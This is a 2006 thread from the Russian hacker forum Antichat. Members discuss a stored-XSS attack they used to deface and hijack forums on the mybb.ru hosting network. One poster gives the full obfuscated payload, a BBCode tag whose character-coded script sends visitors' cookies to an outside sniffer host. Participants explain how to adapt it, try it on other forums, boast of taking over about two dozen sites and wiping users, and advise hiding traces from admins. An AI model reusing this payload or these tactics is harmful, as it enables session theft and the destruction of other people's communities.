Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Mybb.ru - прощай :) (https://forum.antichat.xyz/showthread.php?t=26304)

GOOFY 01.11.2006 00:39

Mybb.ru - прощай :)
 
Знакомимся :) бб...
http://night.5bb.ru/, дифейсик через обычную xss (отправил сегодня в раздел видео, буду надеятся, что добавят :))
таким же макаром можно задифейсить любой из сети форумов - mybb.ru, 1bb 2bb и тд...
жду комментов :)

.Slip 01.11.2006 00:48

Где ж тут дефейс. Просто написание матершины, и всё:) А так молодец. Если правда конечно же. Ибо это можно и самому такой форум сделать, и всё в настройках прописать.

GOOFY 01.11.2006 00:52

[sL1p]:
Всмысле правда? Ну так попакостили с напарником им немного, рассылку сделали, причем пришел ответ от одного обиженного -
Цитата:

Гениально,аж до офигевания,вам череп не жмет? - kuroj@bk.ru
. именно сейчас делаю мощную зачистку - форум тает на глазах :) 270 юзеров в бешенстве :) нефиг вампирами быть :)

.Slip 01.11.2006 00:53

Выложи код xss, через которую ты это всё взломал.

GOOFY 01.11.2006 00:56

вот и она...
PHP код:

[email=XSS@XSS[url=style=background:url(javascript:document.write(String.fromCharCode(1054,1096,1080,1073,1082,1072,32,52,48,52,60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,99,111,109,112,45,105,110,102,111,46,114,117,47,112,105,99,47,105,109,97,103,101,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62,32)));display:none;][/url]][/email


Digimortal 01.11.2006 02:17

а деф голимый.. мягко говоря..

IOBOWAN 01.11.2006 06:23

http://rap.5bb.ru/viewtopic.php?pid=596#p596
у меня не прокатила(

GOOFY 01.11.2006 10:06

Digimortal:
лично мне было неохото особо то возиться с ними :) зато сайт свой порекламил немного :)
IOBOWAN:
lol :) ты не догадался исправить путь к сниферу на свой? :) грубо говоря ты сделал 20% работы и думал, что пассы сами к тебе свалются :)

-Concord- 01.11.2006 10:54

Хм. я это тоже не понял... допустим картинка у меня на http://antichat.org/s/serversmchat.gif то какой должен быть код. напишите кто знает.

GOOFY 01.11.2006 10:57

держите видео, может кому пригодится, незнаю когда на а.чате в видео опубликуют, если вообще опубликуют...
http://flood3r.com/files/mybb.rar (2,5 Mb)

!achtung
друзья, не пакостите сильно, а то через 2 дня ничего работать не будет(
после захвата форума, удалите созданные вами "злые" темы, дабы не палить
xss глупым админам сервиса.

IOBOWAN 01.11.2006 12:37

блин ктонибуть может перевправить код под стандартный сниффер?

GOOFY 01.11.2006 12:41

читайте статьи на а.чате, там это точно было. это обычный декод (аля - 2 это 1+1) :)

Geniy 01.11.2006 13:03

Ну не весь mybb. Часть майбб на инвижине - например 0bb.ru

GOOFY 01.11.2006 13:08

а другая часть на жувачке? :D
ну насколько я знаю, майбб это в расшифровке - мой буллетин боард, если так, то все форумы, независимо, от 0bb или 1bb (RUHELP Goodboard Webtalk MyBB 0bb 1bb 3bb 4bb 5bb это все клоны), это одни и теже яйца. (модефикации булки короче, как я понял)

IOBOWAN 01.11.2006 13:16

молодец канешна
плюс однозначно заслужил
но никто не подскажет где расшифровать эти цифры что в коде
помню у меня ссылка буржуйская была тама статья про хсс
там был калькулятор
но после формат с ничо неосталось
мож кто подкинет сылочку

GOOFY 01.11.2006 13:19

Geniy:
sorry, может ты и прав, что не одни это теже движки... незнаю...

Geniy 01.11.2006 13:21

0bb,1bb,2bb - IPB
3bb,4bb,5bb - PUN

Фича работает ток на движке пун..

GOOFY 01.11.2006 13:23

а mybb это ведь пан?
p/s - http://glebclub.4bb.ru/viewtopic.php?pid=16104#p16104 ждем пассов :)

Geniy 01.11.2006 13:26

Сам mybb.ru - да PUN

IOBOWAN 01.11.2006 13:39

а на webtalk проканает сабж?

GOOFY 01.11.2006 13:41

пока прокатывает, но уже заделали суки немного, теперь чтобы сменить ретривное мыло нужен пасс, которого, понятно дело, нету. вот такая шляпа. так, что единственная тема, это счастливый угон кук именно админа... жалко блин ):

Geniy 01.11.2006 13:44

Цитата:

а на webtalk проканает сабж?
Хм.. Вкбталк это пхпбб Вроде.. Врядли..

GOOFY 01.11.2006 13:52

один я чтоли их сейчас чищу? :) у меня уже 6 за сегодня :)

IOBOWAN 01.11.2006 14:18

проверил
на вебтолке не катит
а жаль

GOOFY 01.11.2006 14:54

самое интересное, что в некоторых профилях юзеров возможно изменить мыло а в некоторых лишь с паролем, причем все это на одном и томже форуме, что за колдовство...

Goudini 05.11.2006 01:03

Походу, вроде прикрыли
Цитата:

В наших форумах была найдена уязвимость, позволяющаю вставить javascript в сообщение и получить куки пользователя.
По приблизительным данным злоумышленником было испорчено около 5-6 форумов (включая этот).

В данный момент такой уязвимости уже нет.

Кроме того, сделана авторизация с проверкой ip адреса.
Поэтому даже получив куки, злоумышленник ничего сделать не сможет.
При смене ip адреса Вам нужно будет повторно авторизоваться.

Могу с уверенностью сказать, что с новой системой авториации взломать форум просто невозможно.

.Slip 05.11.2006 01:11

Цитата:

что с новой системой авториации взломать форум просто невозможно.
Лольно:) Надо будет на досуге скули там поискать. Кстати эти лолеги на форуме бб шухер подняли ужасный, уже собирали антихакерскую коалицию, и хотели идти ломать ачат:)

GOOFY 05.11.2006 14:02

просто один умник (мой напарник :)) решил похачить форум тех. поддержки, и как видете, реально помогло залочить эту xss, а жаль.
ps/ пиздежь, лично я 22 форума угнал, + постал дюк при мне 1, напарник штук 6, так что цифра - 6, официально заявленная, это, попросту говоря, бред.

[ angel of death ] 05.11.2006 15:26

сколько всего форумов бб хакнули? :)

Brahma 05.11.2006 15:50

http://forum.mybb.ru/viewtopic.php?id=12 песдец каламбур ::)

NIGHT_WOLF 05.11.2006 15:56

Цитата:

Сообщение от Brahma
http://forum.mybb.ru/viewtopic.php?id=12 песдец каламбур ::)

(с) античат нафиг не пашет, не лазте туда там вирусов тофига!!!
гы =)

Так чем путь к снифферу зашифрован ?

.Slip 05.11.2006 16:45

Я хз чем зашифрован, похож на бинарную зашифровку, но не то всё равно.
Его можно было хоть чем зашифровать. Хоть тот же base64 или Hex url. Всё равно бы форум выполнил весь скрипт, и отослал куки на сниффер.
ЗЫ Столько гостей в этой теме, столько народу с бб нас читают:) Лолегам привет:)

Digimortal 05.11.2006 17:03

Цитата:

Сообщение от [sL1p]
Я хз чем зашифрован, похож на бинарную зашифровку, но не то всё равно.

=)))))
[sL1p], это ж просто Ascii-кодировка...

-Concord- 05.11.2006 17:09

Интеренсо почитать ))) http://forum.mybb.ru/viewtopic.php?id=12&p=29

У них за 2 дня 29 страниц дебатов)

GOOFY 05.11.2006 17:33

я в шоке. 29 страниц накатали.
я под столом. боятся зайти на ф.ком и на ачат думая что на них нападут кусучие вирусы. не умея пользоваться фаерволом и антивирусом хотят напакостить.
Цитата:

Ness написал:
тык на http://flood3r.com/ кто нить был?
я... обычный сайт, много софта хакерного. возможно с вирусами
/у них все с вирусами, даже пирожки от бабушки кати :) на ф.ком нету ни байта хакерского софта да и тем более с вирусами.
Цитата:

Грин, зачем тебе файер? Раз ты каспером не пользуешься... можно идти и без файера. Через проксю.
куда они идти то собрались??? на этот форум?! таких тупиц надо поискать.
Цитата:

а и я всем советую компы проверить спомощью cureit я проверил до такого как на взломаный мабб в 12 00 гдето я зашёл на майбб потом ищё раз проверился было 12 троянов щас ищё проверяюсь
это вообще мистика, меньше водки пить надо.
Цитата:

ТаББаК - я труб, 452вируса..помните меня...
это пёрл уходящего 2006 года :)
Цитата:

Рукия Кучики - Люди, помогите!!!
Мне в ICQ Стучится некий G O O F Y!!!! Что делать? Я откланила, но все равно не по себе...Откуда он вообще мою Аську узнал?
нахуя мне комуто стучать, ржу.
Цитата:

Usher - Gekkon написал:
Или хотя б заберем... http://antichat.ru/ICQ/
смотри потом по шапке не получи
умницы :)
Цитата:

Usher - вот они, наши враги http://flood3r.com/articles/1/
базара ноль, это и моги враги :)

потом они узнали страшную мою тайну :)
http://erochat.ru/ui.html?qn=-----GOOFY..s..&mn=INDEX_FORM&w=v
это типо я :)

/итоги
юзеры дико стали беситься и обязательно скопипастят половину этого топика и будут его обсуждать лет 10. они уже создали антихакерскую коалицию, так что всем готовиться :)

nuoHeP 05.11.2006 17:35

Цитата:

Сообщение от NIGHT_WOLF
(с) античат нафиг не пашет, не лазте туда там вирусов тофига!!!
гы =)

Так чем путь к снифферу зашифрован ?

Ну действительно, не руками же вы сидите кодируете....

_-[A.M.D]HiM@S-_ 05.11.2006 17:57

_http://ha.ckers.org/xss.html

GOOFY 05.11.2006 18:03

Цитата:

http://ha.ckers.org/xss.html
как вариант :)

Digimortal 05.11.2006 18:10

ксати, сорри, я взял всего лишь кусочек кода и написал, что аски.. конечно, это уникод..
это всего лишь т.н. десятичное представление символов..

GOOFY 05.11.2006 18:12

Digimortal:
ты это о чем? :)


Время: 04:07